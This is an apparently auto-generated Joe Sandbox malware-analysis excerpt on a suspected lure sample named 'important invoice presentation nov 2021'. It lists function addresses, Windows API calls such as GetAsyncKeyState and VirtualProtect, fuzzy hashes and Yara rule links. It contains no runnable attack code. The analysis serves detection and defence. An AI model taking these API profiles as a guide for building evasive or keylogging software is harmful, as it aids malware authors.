Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: f3d729b13241bf4f5cc1df5533650f95811f07e4f355e9d56d6e5bc8490d65d7
Instruction ID: 6885fbe5ac8d67fac2820f427a1e061d511f367f6c5f051a01ff9722f6b41aa7
Opcode Fuzzy Hash: f3d729b13241bf4f5cc1df5533650f95811f07e4f355e9d56d6e5bc8490d65d7
Instruction Fuzzy Hash: A611DDB0801B408BD3209F2AC140656FBF8BFA8714B104A0FD5D687AA1C7B0A208DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D8DC52, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00D9AD8D,00E2E710,00000018,00000003,00E2E730,00000024,00D8D262,00000016,00D8DA6F,00000007,000000FF), ref: 00D8DC84

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 01b7b8d3d984ab7b1ce651a4d852656efd288791112dfda3cb749c477464ea20
Instruction ID: bce7348aa581f0f29cc30d76bc2b77d4cf42bb568d7d26a0d526f0fcf8e8891a
Opcode Fuzzy Hash: 01b7b8d3d984ab7b1ce651a4d852656efd288791112dfda3cb749c477464ea20
Instruction Fuzzy Hash: ABE065755443216BDA213A7A9C05B6E7B5BDF467A0F190121EC45D72D0DBA0DC01D3F5

Uniqueness

Uniqueness Score: -1.00%

Function 00D5944E, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMT ref: 00D5944E

Part of subcall function 00D5A81E: ___get_entropy.LIBCMT ref: 00D5A838

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ___get_entropy___security_init_cookie
String ID:
API String ID: 864368843-0
Opcode ID: 13634f7501f44972a2ea785787ede5cfc61c6c35ae9c59c8205cdc2d2e6fcf3a
Instruction ID: ccc7e139f429f7f7eb992d8b29c6ae0362409bd8f318c3a15408079bb6387d73
Opcode Fuzzy Hash: 13634f7501f44972a2ea785787ede5cfc61c6c35ae9c59c8205cdc2d2e6fcf3a
Instruction Fuzzy Hash: CEE0C260688734B5DC1133A45C37FEE811ACF0AB13F0800007E453D8D31E98460DA5B7

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2B11, Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00BC2B18

Part of subcall function 00BC6590: EnterCriticalSection.KERNEL32(00E48118,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65C1
Part of subcall function 00BC6590: InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65D7
Part of subcall function 00BC6590: LeaveCriticalSection.KERNEL32(00E48118,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65E5
Part of subcall function 00BC6590: EnterCriticalSection.KERNEL32(00000000,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65F2

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: 2dfad9c904dbf1b45b640e1f8c8471a68b257093bbd850feaa5ffd9bd73fbb27
Instruction ID: 6f16f5828df5fd6a0c5de5d9e30c607e2ad007cb461f1a9c76b32cb636e658e3
Opcode Fuzzy Hash: 2dfad9c904dbf1b45b640e1f8c8471a68b257093bbd850feaa5ffd9bd73fbb27
Instruction Fuzzy Hash: 6DE0E57090020ADFEF54AF60C446F8CBBA0FF24322F204179E5519A2E1DFB04991DB24

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2359, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BB2360

Part of subcall function 00BC2713: LocalAlloc.KERNEL32(00000040,00000000,?,00BC2D3E,00000010,?,?,00000000,?,?,?,?,?,00D595F0,00B90000,00000000), ref: 00BC271B

Part of subcall function 00BB1E8B: __EH_prolog3_catch.LIBCMT ref: 00BB1E92

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AllocH_prolog3H_prolog3_catchLocal
String ID:
API String ID: 1948148156-0
Opcode ID: 51db5640f9dea05b6cac0292e2e7cb68292fd6c45ac3f9b762fad42ec3582874
Instruction ID: 31b681b0f79d3ce11bb9814adaca19a4976d2352e55b08d95eeb7ae28842a499
Opcode Fuzzy Hash: 51db5640f9dea05b6cac0292e2e7cb68292fd6c45ac3f9b762fad42ec3582874
Instruction Fuzzy Hash: 70E01271A5163187DB60AF6444527BC90E0AB04B51F510599EE41AF282DBF54D0543ED

Uniqueness

Uniqueness Score: -1.00%

Function 00C00C73, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000029,?,?,00000000), ref: 00C00C8F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: f1a5ea51c3ead2161e40dd1dd0809397854b4ebf0668edc64a06b6619461d93a
Instruction ID: a9125ecbef0be07ececb446a9e0a7b24bf8e3cb4d659c845758c45b326925687
Opcode Fuzzy Hash: f1a5ea51c3ead2161e40dd1dd0809397854b4ebf0668edc64a06b6619461d93a
Instruction Fuzzy Hash: 4BD0C970140604EFE7015B80DC09BA577A8AB55705F904064F6089E6A1C7B66855CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3BD5, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BB3BE4

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: DeleteObject
String ID:
API String ID: 1531683806-0
Opcode ID: f6d45e555f90eded93365fb539e4f6462dff47673d997732cbeb27e4fd3fffc9
Instruction ID: 8a4e1acd806c2b436a68c3f992928ec5f4a4d3836302b96f8e6ad0c63cf109a2
Opcode Fuzzy Hash: f6d45e555f90eded93365fb539e4f6462dff47673d997732cbeb27e4fd3fffc9
Instruction Fuzzy Hash: 67B09260A12304EBDE1067788A093A66AE8DB51B07F1489D4A000D2205DAB9C2028518

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00BE106A, Relevance: 37.3, APIs: 20, Strings: 1, Instructions: 514windowstringCOMMON

Download Yara Rule

APIs

SHGetPathFromIDListA.SHELL32(?,?), ref: 00BE110C
SHGetPathFromIDListA.SHELL32(?,?,?,?,00000000), ref: 00BE1140
SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000408), ref: 00BE11E9
SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000408), ref: 00BE1208
lstrcmpiA.KERNEL32(?,?), ref: 00BE1224
SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00BE1305
SendMessageA.USER32(?,0000100C,?,00000002), ref: 00BE133B
ClientToScreen.USER32(?,?), ref: 00BE137B
ScreenToClient.USER32 ref: 00BE1390
SendMessageA.USER32(?,00001012,00000000,?), ref: 00BE13AA
SendMessageA.USER32(?,00001005,00000000,00000004), ref: 00BE1421
SendMessageA.USER32(?,0000100C,?,00000002), ref: 00BE144D
SendMessageA.USER32(?,00001005,00000000,00000004), ref: 00BE146B
CreatePopupMenu.USER32 ref: 00BE14F3
TrackPopupMenu.USER32(00000000,00000102,?,?,00000000,?,00000000), ref: 00BE1543
GetMenuDefaultItem.USER32 ref: 00BE155E
GetParent.USER32(?), ref: 00BE15C5
GetParent.USER32(?), ref: 00BE1617
GetParent.USER32(?), ref: 00BE162A
SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00BE1642

Strings

$, xrefs: 00BE15BB

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$MenuParent$ClientFileFromInfoListPathPopupScreen$CreateDefaultItemTracklstrcmpi
String ID: $
API String ID: 3998805096-3993045852
Opcode ID: 407b6d3110077746607b1fc8f86376ebe3eaf61e1fb6746bce1a958bd860439c
Instruction ID: 48d3115c1b487d54c9e4c8c043f611e2e8fe2983d498da56758302b94c4e2e77
Opcode Fuzzy Hash: 407b6d3110077746607b1fc8f86376ebe3eaf61e1fb6746bce1a958bd860439c
Instruction Fuzzy Hash: 4A126D75A00259EFDB248F6ADC84AAEBBF9FF48700F2445A9E905E7250DB709D40CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B9E230, Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 352COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00B9E2B3
SysFreeString.OLEAUT32(?), ref: 00B9E2C5

Strings

Group, xrefs: 00B9E38D
organizationalUnit, xrefs: 00B9E46D
Computer, xrefs: 00B9E2AD
User, xrefs: 00B9E54D

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: FreeString__fassign
String ID: Computer$Group$User$organizationalUnit
API String ID: 984984552-1538508054
Opcode ID: f7fdb59c51b26f60bab789c1fa0f1cc7f77b94a11a7f1fbfd9419968f69b617b
Instruction ID: 6b9211c912e1b87c8b490db06b01b0c00dc29d4d9f36b7c30d03a786c535cf8d
Opcode Fuzzy Hash: f7fdb59c51b26f60bab789c1fa0f1cc7f77b94a11a7f1fbfd9419968f69b617b
Instruction Fuzzy Hash: 15B18371A04609EFDB14DFA8DC45BAAB7E4EF45324F14867DF829D7690DB31D9008B90

Uniqueness

Uniqueness Score: -1.00%

Function 00BD655F, Relevance: 16.6, APIs: 11, Instructions: 137fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BD6569
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000158,00BD5702,?,?,00000000,?,00BCEF11,?,?,?,?,?), ref: 00BD659C
PathIsUNCA.SHLWAPI(?,?,?,?,00BCEF11,?,?,?,?), ref: 00BD6619
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00BCEF11,?,?,?,?), ref: 00BD663D
__cftof.LIBCMT ref: 00BD65B0

Part of subcall function 00BD651D: GetLastError.KERNEL32(?,?,?,00BD664E,?,?,?,00BCEF11,?,?,?,?), ref: 00BD6529

Part of subcall function 00BD5915: __cftof.LIBCMT ref: 00BD593A
Part of subcall function 00BD5915: PathStripToRootA.SHLWAPI(00000000,?,?,00BCEF11,?,?,?,?), ref: 00BD5949

_strlen.LIBCMT ref: 00BD65DF
CharUpperA.USER32(?,?,00BCEF11,?,?,?,?), ref: 00BD666B
FindFirstFileA.KERNEL32(?,?,?,00BCEF11,?,?,?,?), ref: 00BD6683
FindClose.KERNEL32(00000000,?,00BCEF11,?,?,?,?), ref: 00BD668F
_strlen.LIBCMT ref: 00BD66AE
_strlen.LIBCMT ref: 00BD6709

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Path_strlen$Find__cftof$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
String ID:
API String ID: 4231165794-0
Opcode ID: 96336f3ffc3e864122c958d725333aad0a051fbcabc7be63176b3b0b9fd29faf
Instruction ID: 4c7d332afcacf539fafcc015d5d9343af1de79c3ea1a7491a86779cd62c72a17
Opcode Fuzzy Hash: 96336f3ffc3e864122c958d725333aad0a051fbcabc7be63176b3b0b9fd29faf
Instruction Fuzzy Hash: 81415071900518EFDB24AF64CC89AEEB7ACEF54315F0046DAB419A2345FB34EE848A31

Uniqueness

Uniqueness Score: -1.00%

Function 00BAC0F7, Relevance: 15.1, APIs: 10, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00BAC0FE
FindResourceA.KERNEL32(?,00000000,00000005), ref: 00BAC13F
LoadResource.KERNEL32(?,00000000), ref: 00BAC147

Part of subcall function 00BB75AA: UnhookWindowsHookEx.USER32(?), ref: 00BB75D4

LockResource.KERNEL32(?,00000024,00B9D854,00000000,4B5C1563), ref: 00BAC154
GetDesktopWindow.USER32 ref: 00BAC18B
IsWindowEnabled.USER32(00000000), ref: 00BAC196
EnableWindow.USER32(00000000,00000000), ref: 00BAC1A2

Part of subcall function 00BBEB10: IsWindowEnabled.USER32(?), ref: 00BBEB1B

Part of subcall function 00BBE314: EnableWindow.USER32(?,4B5C1563), ref: 00BBE325

EnableWindow.USER32(00000000,00000001), ref: 00BAC286
GetActiveWindow.USER32 ref: 00BAC290
SetActiveWindow.USER32(00000000,?,00000024,00B9D854,00000000,4B5C1563), ref: 00BAC29C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$EnableResource$ActiveEnabled$DesktopFindH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 2731338901-0
Opcode ID: 363e516b4c57ba947b89905536bba94a04d026223689b3a3ade2be0d1f141832
Instruction ID: 8651af3a91a78c991f200b168f4973e9ea9ac63b0a3f412d934fc6ed63c5245e
Opcode Fuzzy Hash: 363e516b4c57ba947b89905536bba94a04d026223689b3a3ade2be0d1f141832
Instruction Fuzzy Hash: 69513770A04716DBDF14ABA48889BEEBBE5FF49711F044299E811B7392CF749C41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BE3003, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 223comCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BE300D
GetVersionExA.KERNEL32(00000094), ref: 00BE3087
__cftof.LIBCMT ref: 00BE31A8
_strlen.LIBCMT ref: 00BE31C1
CoInitializeEx.OLE32(00000000,00000002), ref: 00BE3209
CoCreateInstance.OLE32(00DFD630,00000000,00000001,00DCB83C,?), ref: 00BE3252

Strings

@, xrefs: 00BE3162

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CreateH_prolog3_InitializeInstanceVersion__cftof_strlen
String ID: @
API String ID: 3157603938-2766056989
Opcode ID: 01ed656e94ce0d9f5b0a46fd55b6b8af93ad7983e62cfc89b4af28156149741f
Instruction ID: 6901289133e152dea931203f02d2377519d388dc369fde4ac11660647cac97cf
Opcode Fuzzy Hash: 01ed656e94ce0d9f5b0a46fd55b6b8af93ad7983e62cfc89b4af28156149741f
Instruction Fuzzy Hash: E7916971B00756EFDB48DF25C845B9ABBE8FF05710F00429AE958D7281DB70AA54CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BAACF6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,00000000,?,00BAA4AA,00E19318,00E18508,00000014,00BBDECF,InitCommonControlsEx,00E19318,00000010,00BBCABE,00000008,00000000,?,00BB7175), ref: 00BAAD0A
GetLastError.KERNEL32(00000008,00000000,?,00BAA4AA,00E19318,00E18508,00000014,00BBDECF,InitCommonControlsEx,00E19318,00000010,00BBCABE,00000008,00000000,?,00BB7175), ref: 00BAAD41

Part of subcall function 00BAAE42: GetModuleFileNameW.KERNEL32(?,?,00000105,?,00BAA4AA,00E19318,00E18508,00000014,00BBDECF,InitCommonControlsEx,00E19318,00000010,00BBCABE,00000008,00000000), ref: 00BAAEF2
Part of subcall function 00BAAE42: SetLastError.KERNEL32(0000006F,?,00BAA4AA,00E19318,00E18508,00000014,00BBDECF,InitCommonControlsEx,00E19318,00000010,00BBCABE,00000008,00000000,?,00BB7175,00000008), ref: 00BAAF06

Strings

@Mxt, xrefs: 00BAAD41
IsolationAware function called after IsolationAwareCleanup, xrefs: 00BAAD05

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorLast$DebugFileModuleNameOutputString
String ID: @Mxt$IsolationAware function called after IsolationAwareCleanup
API String ID: 3265401609-217452736
Opcode ID: c13cc54c49eec61afe54ffb8e5c82b79d87f48e76b483ad869a86f05d5457fff
Instruction ID: e672862875066119855341af8bec84133598f659458146a8873c79091251de24
Opcode Fuzzy Hash: c13cc54c49eec61afe54ffb8e5c82b79d87f48e76b483ad869a86f05d5457fff
Instruction Fuzzy Hash: F8F0A435A182159B8B341B659C44529BBD8EB17B4372800BAF8C1D6930D730CC09C6B7

Uniqueness

Uniqueness Score: -1.00%

Function 00BF8181, Relevance: 6.4, APIs: 4, Instructions: 409keyboardCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF8188
GetAsyncKeyState.USER32(00000011), ref: 00BF81E1

Part of subcall function 00BFB88F: __EH_prolog3_GS.LIBCMT ref: 00BFB896
Part of subcall function 00BFB88F: IsRectEmpty.USER32(?), ref: 00BFB8B1
Part of subcall function 00BFB88F: InvertRect.USER32(?,?), ref: 00BFB8C7
Part of subcall function 00BFB88F: SetRectEmpty.USER32 ref: 00BFB8D4

GetAsyncKeyState.USER32(00000011), ref: 00BF855A
GetAsyncKeyState.USER32(00000012), ref: 00BF85A0

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AsyncRectState$Empty$H_prolog3H_prolog3_Invert
String ID:
API String ID: 1053828128-0
Opcode ID: ad9850da080bb4edfd01350c398f9c887384a487cf7e3be9085565095ccb31dc
Instruction ID: 8a06b054645f455f033490bc9b32e808bbe926f7d91bdaa2644f83401d4ac372
Opcode Fuzzy Hash: ad9850da080bb4edfd01350c398f9c887384a487cf7e3be9085565095ccb31dc
Instruction Fuzzy Hash: 51E1E331B0060AEFCB19DB68C894BBDB7E9FF84710F144299E615AB291CF70AD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00D7216B, Relevance: 6.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,?,00000000), ref: 00D72194
GetSystemInfo.KERNEL32(?,?,?,00000000), ref: 00D721A8
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,00000000), ref: 00D721F8
VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,00000000), ref: 00D7220D

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
